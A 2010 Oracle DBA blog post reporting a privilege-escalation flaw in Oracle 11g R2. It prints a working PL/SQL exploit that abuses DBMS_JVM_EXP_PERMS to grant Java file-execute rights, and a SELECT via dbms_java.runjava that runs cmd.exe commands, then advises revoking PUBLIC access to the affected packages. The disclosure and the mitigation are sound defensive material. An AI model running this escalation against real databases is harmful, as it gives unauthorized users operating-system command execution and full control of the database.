Oracle Exploit Published 11g R2

Posted by oraclue on February 5, 2010 · 5 Comments 

Just found this alert..

Credit goes to David Litchfield .He found these vulnerabilities .This also affects 11g R2.

Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database.

Basically  using DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS user can change their privileges in the Java policy table so that the JVM allows them to execute operating system commands and to read and write files.

Here is  code:

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

Oracle does not have patch for it yet but you should revoke privileges from PUBLIC for following packages:

revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from  public;

About these ads

Filed under Security, Uncategorized

Comments
5 Responses to “Oracle Exploit Published 11g R2”
  1. Michael O'Neill says:
    February 5, 2010 at 10:21 pm

    Java Bad (waves arms slowly and awkwardly at imaginary flames).

    Reply
Trackbacks
Check out what others are saying...
  1. uberVU - social comments says:
    February 8, 2010 at 3:18 am

    Social comments and analytics for this post…

    This post was mentioned on Twitter by msutic: Oracle Exploit Published 11g R2 – http://oraclue.com/2010/02/05/oracle-exploit-published-11g-r2/

    Reply
  2. Most Tweeted Articles by Oracle Experts: MrTweet says:
    February 8, 2010 at 11:29 am

    Your article was most tweeted by Oracle experts in the Twitterverse…

    Come see other top popular articles surfaced by Oracle experts!…

    Reply
  3. Log Buffer #178: a Carnival of the Vanities for DBAs | The Pythian Blog says:
    February 12, 2010 at 6:41 pm

    [...] solutions and recommendations.Miladin Modrakovic explains how to avoid an Oracle 11g vulnerability: Oracle Exploit Published 11g R2. Gary Myers makes his own contribution about security issues with 10g and 11g in Exploits and [...]

    Reply
  4. Blogroll Report 29/01/2009 – 05/02/2010 « Coskan’s Approach to Oracle says:
    March 5, 2010 at 9:59 am

    [...] 0 day exploit Miladin Modrakovic-Oracle Exploit Published 11g R2 2-Faulty quotes about Non Default Block Sizes Charles Hooper-Faulty Quotes 5 – Block Sizes [...]

    Reply


Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 32 other followers

%d bloggers like this: